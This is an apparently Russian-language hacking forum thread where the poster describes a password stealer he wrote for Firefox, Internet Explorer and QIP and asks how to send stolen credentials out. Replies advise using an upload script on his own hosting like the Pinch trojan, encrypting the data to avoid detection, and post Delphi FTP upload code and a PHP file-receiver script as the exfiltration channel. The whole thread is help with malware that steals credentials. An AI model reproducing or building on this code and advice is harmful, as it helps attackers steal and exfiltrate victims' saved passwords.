В общем написал я стилер ff\ie\qip - но возникла проблема. Куда мне деть все пароли ??? А если быть точнее - куда отослаь больше 3к знаков ??? На мыло не хочет, на icq - не вариант. Подскажите пожалуйста
на свой хостинг. на какойнить php скрипт. Типа как у троев всяких типа пинча. Кстати, а чем тебе мыло не подходит? можно, тока надо шифровать предварительно., чтобы небыло паливно сильно
дело в том что если к примеру у чувака я стырил 400 строк: 1 строка - адрес 2 строка - логин 3 стркоа - пароль адрес минимум значений 10 у меня дельфи просто отказывает такое кол-во посылать на мыло - именно по этому ищу альтерниву. Очень хотелось бы найти статью как сделать такую php страницу как у пинчев
Зайди в гугл и пропиши "Загрузить файл на фтп Delphi" и тебе выдаст полно готовых примеров. Вот код нашел в интернете. Code: uses windows, wininet; var conn_param,inet_open : hinternet; procedure upload(filename:pchar; ftpfilename:pchar); const port=21; begin inet_open := internetopen('iexplore',INTERNET_OPEN_TYPE_DIRECT,nil,nil,0); //Настройки коннекта( фтп, логин, пасс) conn_param := internetconnect(inet_open,'ftp.site.ru',port,'login','pass',INTERNET_SERVICE_FTP,INTERNET_FLAG_PASSIVE,0); sleep(100); ftpputfile(conn_param,filename,ftpfilename,FTP_TRANSFER_TYPE_UNKNOWN,0); internetclosehandle(conn_param); internetclosehandle(inet_open) ; END; begin //Путь к файлу для загрузки, имя файла на фтп.. upload('C:\file.zip','/pub/file.zip'); if True then exit; end. Еще нашел код. Брось на форму компонент TidFTP. Code: begin idFTP1.Host:='ftp_server.ru'; //FTP-сервер idFTP1.Port:=21; //порт ФТП сервера idFTP1.Username:='Логин'; idFTP1.Password:='Пароль'; idFTP.Connect; idFTP1.Put('Файл_который_нужно_загрузить_на_сервер'); idFTP1.Disconnect; end;
програмулина в себе будет нести данные ФТП аккаунта...как думаете, долго она будет безнаказанно работать??? нет.
ну нашел вот код: Code: <? $myfile = $_FILES['myfile']['tmp_name']; $name = basename($_FILES['myfile']['name']); if (!file_exists($myfile)) { echo "error"; } else { move_uploaded_file($myfile, $name); echo "ok"; } ?> он портит у меня загруженный фаил - невозможно его потмо скачать ан комп
вот добавления в текст месаги пассов от мозилы: Code: M.Body.Text:=a.Text у мну все компилируется - ошибок ноль, па при выполнении выдает ошибку приложения. А если задаю размер a.Text в виде 4 строки по 2 символа - отправляет норм. Так что н едешльфя глючная
Из твоего поста не слишком что то понятно, лучше свой исходник покажи, который отвечает за отправку текста по мылу.